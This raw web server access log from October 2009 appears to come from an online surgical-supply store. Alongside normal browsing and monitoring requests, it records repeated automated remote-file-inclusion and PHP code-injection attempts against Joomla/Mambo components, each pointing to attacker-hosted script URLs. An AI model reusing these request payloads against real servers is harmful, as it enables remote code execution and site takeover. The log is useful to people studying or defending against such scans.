93.90.176.25 - - [18/Oct/2009:03:04:32 -0400] "GET /logs/access_log.Q109100100%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:04:32 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:04:32 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
200.201.180.130 - - [18/Oct/2009:03:04:36 -0400] "GET /shop.php?pid= HTTP/1.1" 404 206 "-" "-"
213.25.33.99 - - [18/Oct/2009:03:05:07 -0400] "GET //com_mp3_allopass/allopass.php?mosConfig_live_site=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
213.25.33.99 - - [18/Oct/2009:03:05:09 -0400] "GET /logs/access_log.Q109081700%20%20//com_mp3_allopass/allopass.php?mosConfig_live_site=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.25.33.99 - - [18/Oct/2009:03:05:09 -0400] "GET /logs//com_mp3_allopass/allopass.php?mosConfig_live_site=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:06:13 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:06:13 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:06:13 -0400] "GET /logs/access_log.Q109100100//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
213.25.33.99 - - [18/Oct/2009:03:07:05 -0400] "GET /logs/access_log.Q109061400%20%20//com_mp3_allopass/allopass.php?mosConfig_live_site=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
174.143.3.188 - - [18/Oct/2009:03:07:22 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
174.143.3.188 - - [18/Oct/2009:03:07:22 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
174.143.3.188 - - [18/Oct/2009:03:07:22 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
174.143.3.188 - - [18/Oct/2009:03:07:23 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
95.211.6.161 - - [18/Oct/2009:03:07:40 -0400] "GET /logs//myMailer.class.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
95.211.6.161 - - [18/Oct/2009:03:07:40 -0400] "GET //myMailer.class.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
95.211.6.161 - - [18/Oct/2009:03:07:52 -0400] "GET /logs/access_log.Q109090200//myMailer.class.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:03:08:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
93.90.176.25 - - [18/Oct/2009:03:08:29 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:08:29 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:08:29 -0400] "GET /logs/access_log.Q109100100%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:08:35 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:08:35 -0400] "GET /logs/access_log.Q109100100//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:08:35 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:09:40 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:09:40 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
93.90.176.25 - - [18/Oct/2009:03:09:40 -0400] "GET /logs/access_log.Q109100100//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:03:09:42 -0400] "GET //include/footer.php?_path[counter]=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:03:09:42 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:03:09:42 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
119.30.204.43 - - [18/Oct/2009:03:10:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:10:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:10:56 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:10:56 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:10:59 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76790 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:00 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:00 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:00 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:00 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:00 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:00 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:00 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:00 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:00 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:00 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:00 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:00 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:00 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:01 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:01 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:01 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:01 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:02 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:02 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:02 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:02 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:02 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:02 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:02 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:02 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:02 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:02 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:03 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Sleipnir/2.9.0"
119.30.204.43 - - [18/Oct/2009:03:11:14 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:19 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2172BB4442692000FE8908E+M37+ENG HTTP/1.1" 200 45747 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:20 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2172BB4442692000FE8908E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:20 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2172BB4442692000FE8908E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:21 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Sleipnir/2.9.0"
119.30.204.43 - - [18/Oct/2009:03:11:26 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Sleipnir/2.9.0"
119.30.204.43 - - [18/Oct/2009:03:11:32 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2172BB4442692000FE8908E+M37+ENG HTTP/1.1" 200 59204 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:34 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2172BB4442692000FE8908E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Sleipnir/2.9.0)"
119.30.204.43 - - [18/Oct/2009:03:11:35 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Sleipnir/2.9.0"
119.30.204.43 - - [18/Oct/2009:03:11:38 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Sleipnir/2.9.0"
89.108.122.160 - - [18/Oct/2009:03:11:44 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fileden.com/files/2009/10/16/2605501/IDtest.txt??? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
89.108.122.160 - - [18/Oct/2009:03:11:44 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fileden.com/files/2009/10/16/2605501/IDtest.txt??? HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
89.108.122.160 - - [18/Oct/2009:03:11:44 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fileden.com/files/2009/10/16/2605501/IDtest.txt??? HTTP/1.1" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
89.108.122.160 - - [18/Oct/2009:03:11:49 -0400] "GET /logs/error_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fileden.com/files/2009/10/16/2605501/IDtest.txt??? HTTP/1.1" 404 237 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
89.108.122.160 - - [18/Oct/2009:03:11:54 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fileden.com/files/2009/10/16/2605501/IDtest.txt??? HTTP/1.1" 404 238 "-" "Mozilla/3.0 (OS/2; U)"
89.108.122.160 - - [18/Oct/2009:03:11:54 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fileden.com/files/2009/10/16/2605501/IDtest.txt??? HTTP/1.1" 404 211 "-" "Mozilla/3.0 (OS/2; U)"
216.104.15.134 - - [18/Oct/2009:03:11:55 -0400] "GET /favicon.ico HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.108.122.160 - - [18/Oct/2009:03:11:57 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fileden.com/files/2009/10/16/2605501/IDtest.txt??? HTTP/1.1" 404 216 "-" "Mozilla/3.0 (OS/2; U)"
89.108.122.160 - - [18/Oct/2009:03:12:01 -0400] "GET /logs/error_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fileden.com/files/2009/10/16/2605501/IDtest.txt??? HTTP/1.1" 404 237 "-" "Mozilla/3.0 (OS/2; U)"
220.100.96.65 - - [18/Oct/2009:03:12:58 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=uid=48(apache)%20gid=4294967295%20%BD%EA%C2%B0%A5%B0%A5%EB%A1%BC%A5%D7=4294967295%0A? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
213.25.33.99 - - [18/Oct/2009:03:13:22 -0400] "GET /logs/access_log.Q109081700//com_mp3_allopass/allopass.php?mosConfig_live_site=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:03:13:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.100.96.65 - - [18/Oct/2009:03:13:52 -0400] "GET /logs/access_log.Q109071000//modules/4nAlbum/public/displayCategory.php?basepath=uid=48(apache)%20gid=4294967295%20%BD%EA%C2%B0%A5%B0%A5%EB%A1%BC%A5%D7=4294967295%0A? HTTP/1.1" 404 268 "-" "libwww-perl/5.65"
220.100.96.65 - - [18/Oct/2009:03:13:53 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=uid=48(apache)%20gid=4294967295%20%BD%EA%C2%B0%A5%B0%A5%EB%A1%BC%A5%D7=4294967295%0A? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
